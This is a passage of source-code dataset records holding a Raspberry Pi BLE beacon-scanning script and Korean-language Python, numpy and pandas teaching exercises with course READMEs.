01:43:05\", \n \"devices\": \n [\n {\n \"rssi\": -85, \n \"address\": \"23:93:fd:2e:a9:44\"\n }, \n {\n \"rssi\": -43, \n \"address\": \"83:56:ce:4d:e1:8a\"\n }\n ], \n \"raspId\": \"raspberry test\"\n}\n```\n"
},
{
"alpha_fraction": 0.7030975818634033,
"alphanum_fraction": 0.7083576917648315,
"avg_line_length": 31.913461685180664,
"blob_id": "504833317c71034f56475cebb7064278f933bd15",
"content_id": "cd93608f474626bc511a8ab78b8755a3e9e5e9ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3422,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 104,
"path": "/script.py",
"repo_name": "danielbertolozi/py-beacon-detection",
"src_encoding": "UTF-8",
"text": "#\n#\tScript for Beacon Detection\n#\n#\tThis script was made and tested for the Raspberry Pi 3 using Python 3.2, and tested using iBeacon certificated devices.\n#\tThis script depends on BluePy. For more information: https://github.com/IanHarvey/bluepy\n#\tIt will scan for BLE enabled devices, create a JSON structure and forward it via POST to a remote server.\n#\tIt will also send an identifier for the Raspberry and a timestamp from when the measurings were taken.\n#\tThis was created for detecting Beacon devices inside a closed environment, with multiple Raspberries.\n#\tThe script can be configured. See the options right below the imports, in \"Script Configuration\".\n#\tThere is a filtering mode, which filters the devices that will be inputed to the JSON (remember to set up the IDs in monitor_ids).\n#\tTo toggle between both modes, change variable \"use_filtering\" to your desires.\n#\tExample configuration for monitor_ids: [34:ce:d0:c4:82:90, da:bc:45:31:25:ef]\n#\n#\tThe JSON structure is the following:\n#\n#\t{\n#\t\t\"timestamp\": timestamp, \n#\t\t\"devices\": [\n#\t\t\t{\n#\t\t\t\t\"rssi\": int, \n#\t \t\t\t\"address\": string\n#\t \t\t}, \n#\n#\t \t\t{\n#\t \t\t\t\"rssi\": int, \n#\t \t\t\t\"address\": string\n#\t \t\t}\n#\t \t], \n#\t \t\"raspId\": string\n#\t}\n# \n#\n\nfrom bluepy.btle import Scanner, DefaultDelegate\nfrom time import gmtime, strftime\nimport requests\nimport json\n\n#########\n# Script Configuration\n#########\n\nrasp_id = 'testberry'\nbeacon_address_id = 'address'\nbeacon_rssi_id = 'rssi'\nble_scan_duration = 3\nreq_device_id = 'devices'\nreq_raspid_id = 'raspId'\nreq_timestamp_id = 'timestamp'\npost_destination = 'http://localhost'\nuse_filtering = False\nmonitor_ids = []\nno_devices_found = False # do not change this value\n\nclass ScanDelegate(DefaultDelegate):\n def __init__(self):\n DefaultDelegate.__init__(self)\n\nscanner = Scanner().withDelegate(ScanDelegate())\n\ndef create_device_object(devices):\n\t# This will return a list of objects (each object equals to a BLE device, and contains its rssi and address) in the following fashion:\n\t# [{\"rssi\": int, \"address\": string}, {\"rssi\": int, \"address\": string}]\n\tall_info = []\n\tfor dev in devices:\n\t\tbeacon_data = {}\n\t\tbeacon_data[beacon_address_id] = dev.addr\n\t\tbeacon_data[beacon_rssi_id] = dev.rssi\n\t\tall_info.append(beacon_data)\n\tif beacon_data is None:\n\t\tno_devices_found = True\n\treturn all_info\n\ndef create_device_object_filtering(devices, monitor_ids)\n\t# This function works in the same fashion as the one above, except it will only input the registered IDs to the JSON. 
Useful for monitoring a fixed number of devices\n\tall_info = []\n\tfor dev in devices:\n\t\t\tfor ids in monitor_ids:\n\t\t\t\tif dev.addr == ids:\n\t\t\t\t\tbeacon_data = {}\n\t\t\t\t\tbeacon_data[beacon_address_id] = dev.addr\n\t\t\t\t\tbeacon_data[beacon_rssi_id] = dev.rssi\n\t\t\t\t\tall_info.append(beacon_data)\n\tif beacon_data is None:\n\t\tno_devices_found = True\n\treturn all_info\n\ndef get_timestamp():\n\t# returns timestamp\n\treturn strftime(\"%d-%m-%Y %H:%M:%S\", gmtime())\n\nwhile True:\n\treq = {}\n\tdevs = [] # must be reinitialized at each loop\n\tdevices = scanner.scan(ble_scan_duration)\n\tif use_filtering:\n\t\tdevs.append(create_device_object_filtering(devices, monitor_ids))\n\telse:\n\t\tdevs.append(create_device_object(devices))\n\tif not no_devices_found:\n\t\treq[req_device_id], req[req_raspid_id], req[req_timestamp_id] = devs, rasp_id, get_timestamp()\n\tjson_data = json.dumps(req)\n\tpost = requests.post(post_destination, data=json_data)\n\tprint (post.status_code, post.reason)"
}
] | 2 |
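The script above ships only raw RSSI values, so a backend doing indoor positioning still has to turn them into distances. A common rough approach is the log-distance path-loss model; the sketch below illustrates that model and is not part of the repository — tx_power (the calibrated RSSI at 1 m) and the environment factor n are assumed calibration values.

```python
def estimate_distance(rssi, tx_power=-59, n=2.0):
    """Rough distance estimate (in meters) from an RSSI reading.

    tx_power: calibrated RSSI at 1 m (assumed -59 dBm here).
    n: path-loss exponent, ~2.0 in free space, larger indoors.
    """
    return 10 ** ((tx_power - rssi) / (10 * n))

print(round(estimate_distance(-59), 2))  # ~1.0 m at the calibration point
print(round(estimate_distance(-75), 2))  # ~6.31 m, but far noisier in practice
```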
digicope01/bigdata | https://github.com/digicope01/bigdata | 1dd3ec15a3c53b12297c97afabd4fce63ec57f39 | 5566b4bad80e9a57e604b5053e636b30543085eb | e94c4cae1e0bba666f778b449ad1f0d93be5964c | refs/heads/master | 2020-09-07T19:18:28.497258 | 2019-12-11T00:41:09 | 2019-12-11T00:41:09 | 220,889,133 | 1 | 4 | null | null | null | null | null | [
{
"alpha_fraction": 0.41532689332962036,
"alphanum_fraction": 0.4721328914165497,
"avg_line_length": 27.619047164916992,
"blob_id": "27f4ca2d3a00fc181f24f0c09b2b9afd0392598e",
"content_id": "1a7b8d630d0c3fa893666c9e12eb109f0babd7bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1898,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 63,
"path": "/파이썬프로그래밍/LIST실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# LIST실습문제.py\r\n# 1번 답안\r\nprint( '{0:=^50}'.format( '4' ) )\r\nop = [ '+', '-', '*', '/' ]\r\nnumber1 = input( 'Input number1 : ' )\r\nnumber2 = input( 'Input number2 : ' )\r\nop_select = int( input(\r\n 'Input operator( 1:+, 2:-, 3:*, 4:/ ) : ' ) )\r\n\r\nindex = op_select - 1\r\nresult = eval( number1 + op[ index ] + number2 )\r\n\r\nprint()\r\nprint( 'number1 : {0:^8.2}'.format( number1 ) )\r\nprint( 'number2 : {0:^8.2}'.format( number2 ) )\r\nprint( '{0:^6} {2:^3} {1:^6} = {3:<.2f}'.format(\r\n number1, number2, op[ index ], result ) )\r\n\r\n# 2번 답안\r\nprint( '{0:=^50}'.format( '5' ) )\r\nmax_number = int( input( 'Input max number : ' ) )\r\n\r\nl = list( range( 1, max_number + 1 ) )\r\n\r\nprint()\r\nprint( l )\r\nprint( '1 ~ {0:^6} = {1:<8}'.format(max_number, sum( l )))\r\n\r\n\r\n# 3번 답안\r\nprint( '{0:=^50}'.format( '6' ) )\r\nmax_number = int( input( 'Input max number : ' ) )\r\n\r\neven = list( range( 2, max_number + 1, 2 ) )\r\nodd = list( range( 1, max_number + 1, 2 ) )\r\n# even = [k for k in range( 2, max_number + 1)\r\n# if k % 2 == 0]\r\n# odd = [k for k in range( 2, max_number + 1)\r\n# if k % 2 != 0]\r\nprint()\r\nprint( 'even number : ', even )\r\nprint( '1 ~ {0:^6} = {1:<8}\\n'.format( max_number,\r\n sum( even ) ) )\r\n\r\nprint( 'odd number : ', odd )\r\nprint( '1 ~ {0:^6} = {1:<8}'.format( max_number,\r\n sum( odd ) ) )\r\n\r\n# 4번 답안\r\nprint( '{0:=^50}'.format( '7' ) )\r\nmax_number = int( input( 'Input max number : ' ) )\r\n\r\nl3 = [ x for x in range( 1, max_number + 1 ) if x % 3 == 0 ]\r\nl5 = [ x for x in range( 1, max_number + 1 ) if x % 5 == 0 ]\r\nl = [ x for x in range( 1, max_number + 1 ) if x % 3 != 0\r\n and x % 5 != 0 ]\r\n\r\nprint()\r\n\r\nprint( 'Multiple of 3 : ', l3, '\\n' )\r\nprint( 'Multiple of 5 : ', l5, '\\n' )\r\nprint( 'Excluding Multiple of 3 and 5 : ', l )\r\nprint( 'sum = {0:<6}'.format( sum( l ) ) )\r\n"
},
{
"alpha_fraction": 0.7749999761581421,
"alphanum_fraction": 0.7749999761581421,
"avg_line_length": 19,
"blob_id": "577f59ae536de6d12005fa77ef58226a4d636ec3",
"content_id": "8a12a166485f2908027bcde6855ae548e30b0fd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 48,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 2,
"path": "/파이썬프로그래밍/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "PyChram 다운로드\nhttps://www.jetbrains.com/\n"
},
{
"alpha_fraction": 0.4961685836315155,
"alphanum_fraction": 0.501915693283081,
"avg_line_length": 15.989130020141602,
"blob_id": "17163cfb9ff587eb0b834a8fc04506089e2a863f",
"content_id": "7b87fd0c1207b9c336b537f661626433c5e52dc7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1846,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 92,
"path": "/파이썬머신러닝/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "\n\n\n교재: 파이썬 머신러닝 완벽가이드 - 권철민 지음, 위키북스\n\n\n예제코드 : https://github.com/wikibook/ml-definitive-guide/\n\n예제코드 : https://github.com/chulminkw/PerfectGuide\n\n동영상강의 : https://www.inflearn.com/course/파이썬-머신러닝-완벽가이드/news\n\n데이터 파일 : https://www.kaggle.com/c/titanic/data\n\n\n\n\n=============================================================\n\n타이타닉 생존자 예측 머신러닝 \n\nTitanic: Machine Learning from Disaster\nStart here! Predict survival on the Titanic and get familiar with ML basics\n\nhttps://www.kaggle.com/c/titanic/overview/tutorials\n\n\n\n=============================================================\n\n신용카드 사기 검출 데이터 세트 (144MB)\n\nhttps://www.kaggle.com/mlg-ulb/creditcardfraud\n\n\n=============================================================\n\n Tensorflow 머신러닝 동영상 강의\n \n 홍콩과기대 김성훈 교수 우리말 강의\n https://hunkim.github.io/ml/\n \n \n 스탠포드대 앤드류 응(Andrew Ng) 교수의 영어 강의\nhttps://class.coursera.org/ml-003/lecture\n\n\n=============================================================\n\n앙상블 학습 및 랜덤 포레스트 설명\n\nhttps://excelsior-cjh.tistory.com/166\n\n\n=============================================================\n\n#### fit() 과 transform() 결합사용\nfrom sklearn.base import TransformerMixin\n\nclass A(TransformerMixin):\n\n def fit(self,X):\n \n print('fit:',X)\n \n return self\n \n def transform(self,X):\n \n print('trans:',X)\n \n return X\n \n \ninst = A()\n\ninst.fit('x_data')\n\ninst.transform('y_data')\n\ninst.fit_transform('my_data') \n\n<출력>\n\nfit: x_data\n\ntrans: y_data\n\nfit: my_data\n\ntrans: my_data\n\n\n\n=======================================================\n"
},
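The fit/transform demo in the README record above uses a toy TransformerMixin subclass; the same contract is easiest to see on a real scikit-learn transformer. The sketch below uses StandardScaler from scikit-learn's public API; the tiny input matrix is made up for illustration.

```python
import numpy as np
from sklearn.preprocessing import StandardScaler

X = np.array([[1.0], [2.0], [3.0]])  # made-up data

scaler = StandardScaler()
scaler.fit(X)                        # fit() learns the mean and std from X
print(scaler.transform(X).ravel())   # transform() applies them: [-1.2247  0.  1.2247]

# fit_transform() from TransformerMixin chains both calls,
# exactly like the custom class above prints fit: then trans:
print(StandardScaler().fit_transform(X).ravel())
```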
{
"alpha_fraction": 0.47746968269348145,
"alphanum_fraction": 0.5411611795425415,
"avg_line_length": 14.560811042785645,
"blob_id": "6d3c87a944aa4d8723500a328a994f6dfe8fd7ac",
"content_id": "18aa84fd4628ea880a374be6ab1303d8cdaa1d9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3872,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 148,
"path": "/파이썬프로그래밍/파이썬기초실습.txt",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "-- 파이썬 프로그래밍 실습 과제 --\n\n\n[숫자형 실습문제]\n\n1. 속도와 거리를 입력받아 시간을 계산하여 \n 출력하는 프로그램\n \n 거리 / 속도\n\n2. 길이와 너비를 입력받아 면적과 둘레를 \n 계산하여 출력하는 프로그램\n \n 면적 = 길이 * 너비\n\t \n \t 둘레 = 길이 * 2 + 너비 * 2\n\n3. 화씨 온도를 입력받아 섭씨 온도로 변환하는 \n프로그램\n\n 섭씨 = ( 화씨 - 32 ) / 1.8\n\n4. 두 수를 입력받아 덧셈, 뺄셈, 곱셈, 몫, 나머지\n를 출력하는 프로그램을 작성하세요\n\n\t \n-\n-\n-\n\n[ 문자열 실습과제 ]\n1. s = 'hong gil dong201912121623210' 을 다음과 같이 출력하시오\n\t\n\t Name : hong gil dong\n\t Birthday : 2019/12/12\n\t ID Number : 20191212-1623210\n\t\n2. s = 'PythonProgramming' 내용을 문자열 슬라이싱과 문자열 \n 연결하기를 이용하여 'ProgrammingPython' 으로 변경하여 출력하시오.\n \n3. s = 'hello world'의 내용을 'hi world'로 변경하여 출력하시오.\n\n\t \n-\n-\n-\n\n\n[ list 실습과제 ]\n\n1. 리스트에 '+', '-', '*', '/'를 저장해 놓고 정수 2개를 입력 받고 계산 방식은\n 정수로 입력받아 해당 연산을 수행하는 프로그램을 작성하시오(eval()함수를 사용하세요)\n \n (계산방식은 1이면 '+', 2이면 '-', 3이면 '*', 4이면 '/')\n \n <힌트> op_select = int(input('Input operator( 1:+, 2:-, 3:*, 4:/ ) : '))\n\n2. 1 ~ n까지 합을 출력하는 프로그램을 리스트를 이용하여 작성하시오.\n (range(),sum()함수를 사용하세요, 최대값 n을 input()함수로 입력 받아 사용하세요)\n\t\n <힌트> >>>mylist = [0,1,2,3,4,5,6,7,8,9,10]\n >>>sum(mylist)\n 55\n\t\t \n3. 1 ~ n까지 짝수합과 홀수합을 출력하는 프로그램을 리스트를 이용하여 작성하시오.\n (최대값 n을 input()함수로 입력 받아 사용하세요)\n\n4. 1 ~ n까지 3의 배수와 5의 배수를 제외한 수를 출력하고 그 합을 출력하는 \n프로그램을 작성하시오. (최대값 n을 input()함수로 입력 받아 사용하세요)\n-\n-\n-\n-\n- \n[튜플 실습과제]\n\na=('a1','a2','a3','a4')\n\nb=('b1','b2','b3','b4')\n\n\n(1) q, w, e, r 변수에 튜플 a의 구성요소들을 차례대로 하나씩 넣으시오.(ex) q='a1'\n\n(2) a와 b를 더한 값을 c에 넣어보세요\n\n(3) c의 3번째 자리의 구성요소는 무엇인가?\n\n(4) c의 6번째 부터 끝까지의 구성요소는 무엇인가?\n\n(5) c의 처음부터 3번째의 구성요소는 무엇인가?\n\n(6) c의 4번째 구성요소 제거해 보세요\n ==>에러 발생\n\n(7) c의 5번째 구성요소의 값을 'c1'로 수정해보세요\n ==>에러 발생\n \n\n-\n-\n-\n-\n[ 딕셔너리 실습 ]\n\nsrp={'가위':'보','바위':'가위','보':'바위'}\n\n(1) srp의 key list 생성\n\n(2) srp의 value list 생성\n\n(3) srp의 key와 value 의 한쌍으로된 리스트 생성\n\n(4) srp의 key '가위'에 해당하는 value 출력\n\n(5) srp의 value '바위'에 해당하는 key 출력\n (if문이 사용되는 list 내장,item()함수 사용)\n\n(6) srp에 '찌':'빠', '묵':'찌', '빠':'묵' 추가\n\n(7) srp에 '보자기' 라는 키가 있는지 확인\n\n(8) srp의 key 와 value를 서로 바꾸어서 새로운 사전 srp2를 생성\n\n-\n-\n-\n-\n\n[집합실습]\n\n(1) a = [1,2,3,4] 로 set s1을 생성하시오.\n b = \"aabbccddeeff\"로 set s2를 생성하시오.\n\n(2) s1 에 a,b,c 를 추가하시오.\n\n(3) s2 에 1,2를 추가하시오.\n\n(4) s1과 s2의 교집합을 구하시오.(2가지 방법 모두 )\n\n(5) s1과 s2의 합집합을 구하시오.(2가지 방법 모두)\n\n(6) s1과 s2의 차집합을 구하시오.(기호)\n\n(7) s2와 s1의 차집합을 구하시오.(함수)\n\n(8) s2에서 1을 빼보세요.\n\n(9) s1과 s2의 대칭 차집합을 구하시오.\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5192123055458069,
"alphanum_fraction": 0.5830931663513184,
"avg_line_length": 18.39215660095215,
"blob_id": "5b06928b8bc236fcd4ffa3d5182f65b19b75b1e6",
"content_id": "11c1b9c2dddc652a18d52b4922861a493890ed35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2644,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 102,
"path": "/파이썬데이터분석/numpy 기본 실습 과제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# numpy 기본 실습 과제.py\r\nimport numpy as np\r\nimport scipy.misc\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\n# 1번\r\n# 1. numpy로 5행 6열 2차원 배열을 임의로 만들고 아래 지시대로 출력해보세요\r\nd = np.arange(30).reshape(5,6)\r\nprint(d)\r\n\r\nprint('-'*80)\r\n\r\n# 1.1 데이터를 거꾸로 출력해보세요.\r\nprint(d[::-1,::-1])\r\n\r\nprint('-'*80)\r\n# 1.2 마지막 열을 제외한 모든 열을 출력해보세요.\r\nprint(d[:,:-1])\r\n\r\nprint('-'*80)\r\n# 1.3 전치(transpose) 행렬을 출력해보세요\r\nprint(d.T)\r\n\r\n\r\nprint('-'*80)\r\n# 1.4 2차원을 1차원 배열의 형태로 변형하여 출력하세요\r\nprint(d.flatten())\r\n\r\nprint('-'*80)\r\n# 2. numpy를 사용하여 아래 두개의 행렬을 만들고 지시대로 출력해보세요\r\na = np.arange(16).reshape(4,4)\r\nb = a*2\r\n# 2.1 두개의 행렬을 수평으로 합쳐 결과를 출력하세요\r\nh = np.hstack((a,b))\r\nprint(h)\r\nprint('-'*80)\r\n# 2.2 두개의 행렬을 수직으로 합쳐 결과를 출력하세요\r\nv = np.vstack((a,b))\r\nprint(v)\r\nprint('-'*80)\r\n# 2.3 두개의 행렬을 열로 합쳐 결과를 출력하세요\r\nc = np.column_stack((a,b))\r\nprint(c)\r\n\r\nprint('-'*80)\r\n# 2.4 두개의 행렬을 행으로 합쳐 결과를 출력하세요\r\nc = np.row_stack((a, b))\r\nprint(c)\r\nprint('-'*80)\r\n\r\n\r\n# 3번\r\nface = scipy.misc.face() # face: read only\r\nface01 = face.copy() # face01: read and write 가능\r\nface02 = face.copy() # face02: read and write 가능\r\nface03 = face.copy() # face03: read and write 가능\r\nface04 = face.copy() # face04: read and write 가능\r\n\r\n# 3.1 Red 색상을 모두 0 으로 변경하여 출력한다\r\nface01[:,:,0] = 0\r\n\r\n# 3.2 Green 색상을 모두 0 으로 변경하여 출력한다\r\nface02[:,:,1] = 0\r\n\r\n# 3.3 Blue 색상을 모두 0 으로 변경하여 출력한다\r\nface03[:,:,2] = 0\r\n\r\n# 3.4 Red, Green, Blue 색상 중 100보다 작은 경우\r\n# 모두 0 으로 변경하여 출력한다\r\n#\r\ntime_start = time.time()\r\nface04[face < 100] = 0\r\ntime_end = time.time()\r\nprint('elapsed time :',time_end - time_start)\r\n\r\n# 중첩된 for문 사용하기\r\n# time_start = time.time()\r\n# xmax = face.shape[0]\r\n# ymax = face.shape[1]\r\n# zmax = face.shape[2]\r\n# for i in range(xmax):\r\n# for j in range(ymax):\r\n# for k in range(zmax):\r\n# if face[i][j][k] < 100:\r\n# face04[i][j][k] = 0\r\n#\r\n# time_end = time.time()\r\n# print('elapsed time :',time_end - time_start)\r\n\r\nplt.subplot(221)\r\nplt.imshow(face01)\r\n\r\nplt.subplot(222)\r\nplt.imshow(face02)\r\n\r\nplt.subplot(223)\r\nplt.imshow(face03)\r\n\r\nplt.subplot(224)\r\nplt.imshow(face04)\r\nplt.show()\r\n\r\n"
},
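Problem 3.4 in the record above thresholds pixels with a boolean mask (`face04[face < 100] = 0`) and times it against a triple nested loop. An equivalent vectorized form uses np.where; the sketch below demonstrates the same idea on a small made-up array rather than the scipy face image.

```python
import numpy as np

a = np.array([[120, 30], [99, 250]])  # made-up "pixel" values

# Boolean-mask assignment, as in the exercise (mutates in place):
b = a.copy()
b[b < 100] = 0

# np.where builds a new array instead of mutating:
c = np.where(a < 100, 0, a)

print(b)  # [[120   0] [  0 250]]
print(c)  # same result
```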
{
"alpha_fraction": 0.4386724531650543,
"alphanum_fraction": 0.49639248847961426,
"avg_line_length": 23.66666603088379,
"blob_id": "9e4ed869b0ae09b29d9736d4049e3b39cd5f448e",
"content_id": "5eb4f2a0d982f128e29affe763c33e62bb1bcec9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 725,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 27,
"path": "/파이썬프로그래밍/문자열실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# 문자열실습문제.py\r\n\r\n# 1번 답안\r\nprint( '{0:=^50}'.format( '1' ) )\r\ns = 'hong gil dong201912121623210'\r\n\r\nname = s[ :s.rfind( 'g' ) + 1 ]\r\nbirthday_index = s.rfind( 'g' ) + 1\r\nbirthday = s[ birthday_index: birthday_index + 9 ]\r\nidnumber = s[ s.rfind( 'g' ) + 1: ]\r\n\r\nprint( 'Name : ' + name )\r\nprint( 'Birthday : ' + birthday[ :4 ] + '/' + birthday[ 4:6 ] + '/' + birthday[ 6:8 ] )\r\nprint( 'ID Number : ' + idnumber[ :8 ] + '-' + idnumber[ 8: ] )\r\n\r\n# 2번 답안\r\nprint( '{0:=^50}'.format( '2' ) )\r\ns = 'PythonProgramming'\r\n\r\nprint( s[ s.find( 'Programming' ): ] + s[ :s.find( 'Programming' ) ] )\r\n\r\n# 3번 답안\r\nprint( '{0:=^50}'.format( '3' ) )\r\n\r\ns = 'hello world'\r\n\r\nprint( 'hi' + ' ' + s[ s.find( 'world' ): ] )\r\n"
},
{
"alpha_fraction": 0.6024096608161926,
"alphanum_fraction": 0.7710843086242676,
"avg_line_length": 12.833333015441895,
"blob_id": "5f1344b5aa0ce3e843544aac8fd5189f7a35f60d",
"content_id": "73ee7a287501bc5a02f51c7b8317582c6117d6ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 83,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 6,
"path": "/DACON경진대회/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "https://dacon.io/cpt13/228543\n\n\ntest score RMSE: 2.42520\n\nDACON_RandomForest.ipynb\n"
},
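The DACON note above reports a test-set RMSE; for reference, the metric is just the square root of the mean squared error. A minimal sketch with made-up targets and predictions:

```python
import numpy as np

y_true = np.array([3.0, 5.0, 2.5])  # made-up targets
y_pred = np.array([2.5, 5.0, 4.0])  # made-up predictions

rmse = np.sqrt(np.mean((y_true - y_pred) ** 2))
print(rmse)  # ~0.913
```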
{
"alpha_fraction": 0.4964383542537689,
"alphanum_fraction": 0.557260274887085,
"avg_line_length": 29.98245620727539,
"blob_id": "44a0f27d2bf679d08261748b1f600dd9abfd4591",
"content_id": "7a60a04a6ca6e30bea0405a45f62c25d42849ac7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1855,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 57,
"path": "/파이썬프로그래밍/숫자형실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# 숫자형실습문제.py\r\n\r\n#numeric_ex.py\r\n#1번\r\nprint( '{0:=^50}'.format( '1번' ) )\r\nvelocity = input( 'Input velocity : ' )\r\ndistance = input( 'Input distance : ' )\r\n\r\n#time = eval( distance + '/' + velocity )\r\ntime = int(distance) / int(velocity)\r\n\r\nprint()\r\nprint( 'velocity : {0:<6.2f}'.format( float( velocity ) ) )\r\nprint( 'distance : {0:<6.2f}'.format( float( distance ) ) )\r\nprint( 'time : {0:<6.2f}'.format( time ) )\r\n\r\n#2번\r\nprint( '{0:=^50}'.format( '2번' ) )\r\nlength = input( 'Input length : ' )\r\nwidth = input( 'Input width : ' )\r\n\r\n#area = eval( length + '*' + width )\r\narea = int(length) * int(width)\r\n#circumference = eval( length + '*' + '2' + '+' + width + '*' + '2' )\r\ncircumference = int(length) * 2 + int(width) *2\r\n\r\nprint()\r\nprint( 'length : {0:<6.2f}\\twidth : {1:<6.2f}'.format( float( length ), float( width ) ) )\r\nprint( 'area : {0:<6.2f}'.format( area ) )\r\nprint( 'circumference : {0:<6.2f}'.format( circumference ) )\r\n\r\n#3번\r\nprint( '{0:=^50}'.format( '3번' ) )\r\nfahrenheit = float( input( 'Input fahrenheit : ' ) )\r\n\r\ncelsius = ( fahrenheit - 32 ) / 1.8\r\n\r\nprint()\r\nprint( 'fahrenheit : {0:<6.2f} -> celsius : {1:<6.2f}'.format( fahrenheit, celsius ) )\r\n\r\n#4번\r\nprint( '{0:=^50}'.format( '4번' ) )\r\nnumber1 = int( input( 'Input number1 : ' ) )\r\nnumber2 = int( input( 'Input number2 : ' ) )\r\n\r\nadd = number1 + number2\r\nsubtract = number1 - number2\r\nmultiple = number1 * number2\r\ndivide = number1 / number2\r\nmod = number1 % number2\r\n\r\nprint()\r\nprint( '{0:^6} + {1:^6} = {2:<6}'.format( number1, number2, add ) )\r\nprint( '{0:^6} - {1:^6} = {2:<6}'.format( number1, number2, subtract ) )\r\nprint( '{0:^6} * {1:^6} = {2:<6}'.format( number1, number2, multiple ) )\r\nprint( '{0:^6} / {1:^6} = {2:<6.2f}'.format( number1, number2, divide ) )\r\nprint( '{0:^6} % {1:^6} = {2:<6.2f}'.format( number1, number2, mod ) )\r\n\r\n"
},
{
"alpha_fraction": 0.4185185134410858,
"alphanum_fraction": 0.5037037134170532,
"avg_line_length": 7.962963104248047,
"blob_id": "283a89f259b82a71d4bc153719423c9905736007",
"content_id": "b2cd7769f6c67b3b3b16be7fbafac1b32b4b27c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 548,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 54,
"path": "/파이썬프로그래밍/SET실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# SET실습문제.py\r\n\r\n# 1\r\na = [1,2,3,4]\r\ns1 = set(a)\r\nprint(s1)\r\n\r\nb = \"aabbccddeeff\"\r\ns2 = set(b)\r\nprint(s2)\r\n\r\n# 2\r\ns1.update({'a','b','c'})\r\nprint(s1)\r\n\r\n# 3\r\ns2.update({1,2})\r\nprint(s2)\r\n\r\n# 4\r\ns = s1 & s2\r\nprint(s)\r\n\r\ns = s1.intersection(s2)\r\nprint(s)\r\n\r\n# 5\r\ns = s1 | s2\r\nprint(s)\r\n\r\ns = s1.union(s2)\r\nprint(s)\r\n\r\n# 6\r\ns = s1 - s2\r\nprint(s)\r\n\r\ns = s1.difference(s2)\r\nprint(s)\r\n\r\n# 7\r\ns = s2.difference(s1)\r\nprint(s)\r\n\r\n# 8\r\ns1.remove(1)\r\nprint(s1)\r\n\r\n# 9\r\ns = s1.symmetric_difference(s2)\r\nprint(s)\r\n\r\ns = (s1- s2) | (s2 - s1)\r\nprint(s)\r\n\r\n"
},
{
"alpha_fraction": 0.44212523102760315,
"alphanum_fraction": 0.48197343945503235,
"avg_line_length": 21.5213680267334,
"blob_id": "07b95b8db1bd3132fc0dd81de0dcafdd51d6d0d7",
"content_id": "9ece57262c2f1580a6fb800061eaf7b688829959",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3011,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 117,
"path": "/파이썬데이터분석/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "pip install numpy pandas\n\n=============================================\n#### - pandas DataFrame 행 출력 최대값 설정방법\n\npd.set_option('display.max_rows', 1000)\n\n=============================================\n#### - pandas apply()와 람다식을 사용한 범위 분류\n\n\n##### # 나이에 따라 세분화된 분류를 수행하는 함수 생성. \ndef get_category(age):\n\n cat = ''\n \n if age <= 5: cat = 'Baby'\n \n elif age <= 12: cat = 'Child'\n \n elif age <= 18: cat = 'Teenager'\n \n elif age <= 25: cat = 'Student'\n \n elif age <= 35: cat = 'Young Adult'\n \n elif age <= 60: cat = 'Adult'\n \n else : cat = 'Elderly'\n \n \n return cat\n\n##### # lambda 식에 위에서 생성한 get_category( ) 함수를 반환값으로 지정. \n##### # get_category(X)는 입력값으로 ‘age’ 컬럼 값을 받아서 해당하는 cat 반환\ntitanic['age_cat'] = titanic['age'].apply(lambda x : get_category(x))\n\ntitanic[['age','age_cat']].head(100)\n\ntitanic\n\n\n=============================================\n\n#### Pandas로 컬럼의 유일한 값(unique value)을 찾고 개수 세어보기\n\n \n\n - pd.Series.unique() 를 이용한 유일한 값 찾기\n\n (Return np.ndarray of unique values in the object)\n\n \n\n - pd.Series.value_counts() 를 이용한 유일한 값별 개수 세기\n\n (Returns object containing counts of unique values)\n\n\n\n출처: https://rfriend.tistory.com/267 [R, Python 분석과 프로그래밍의 친구 (by R Friend)]\n\n\n=============================================\n\n\n- merge() 예제 리스트 데이터셋\n\nemployee = [{'empno':1, 'ename':'kim', 'dept':1}, \n\n {'empno':2, 'ename':'lee', 'dept':2}, \n {'empno':3, 'ename':'park', 'dept':1}, \n {'empno':4, 'ename':'song', 'dept':3},\n {'empno':5, 'ename':'min', 'dept':2} ]\n \n\ndept=[{'dept':1, 'deptname':'관리직'}, \n\n {'dept':2, 'deptname':'영업직'},\n {'dept':3, 'deptname':'개발직'} 